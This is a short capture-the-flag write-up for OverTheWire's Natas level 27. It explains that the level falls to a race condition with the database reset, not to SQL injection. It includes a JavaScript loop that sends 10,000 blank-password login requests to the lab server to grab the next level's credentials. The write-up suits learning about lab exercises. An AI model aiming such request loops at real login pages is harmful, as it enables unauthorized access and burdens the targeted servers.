Natas Level 27

All the sql code in this level is there to throw us off.  If you pull off a SQL injection on this level let me know, because AFAIK it is not possible.  The trick to beating this level is in the comments at the top of the page.

natas level 27 src

They’re telling us that the database is reset every 5 minutes.  I wonder what would happen if we repeatedly tried to log in with blank creds, with the goal of attempting the login at the same time it’s cleared.  We can use the following script to find out:

for (i = 0; i < 10000; i++) {
    query = "username=natas28&password=";
    xhr = new XMLHttpRequest();
    xhr.open("POST", "http://natas27.natas.labs.overthewire.org/index.php", false);
    xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
    xhr.send(query);
    console.log(i);
        if (xhr.response.indexOf("Here") != -1) {
        break;
    }
}
console.log(xhr.response);

natas 27 win